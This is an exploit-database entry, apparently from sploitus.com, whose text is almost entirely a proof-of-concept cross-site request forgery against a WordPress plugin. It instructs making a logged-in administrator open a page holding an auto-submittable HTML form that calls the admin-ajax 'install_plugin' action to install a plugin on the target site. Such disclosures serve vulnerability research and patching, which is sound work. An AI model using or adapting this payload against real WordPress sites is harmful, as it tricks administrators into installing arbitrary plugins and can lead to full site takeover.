Share
## https://sploitus.com/exploit?id=WPEX-ID:5A7C6367-A3E6-4411-8865-2A9DBC9F1450
Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin-ajax.php?action=install_plugin" method="POST">
    <input type="text" name="slug" value="hello-dolly">
    <input type="text" name="plugin" value="hello-dolly/hello.php">
    <input type="submit" name="submit" value="submit">
</form>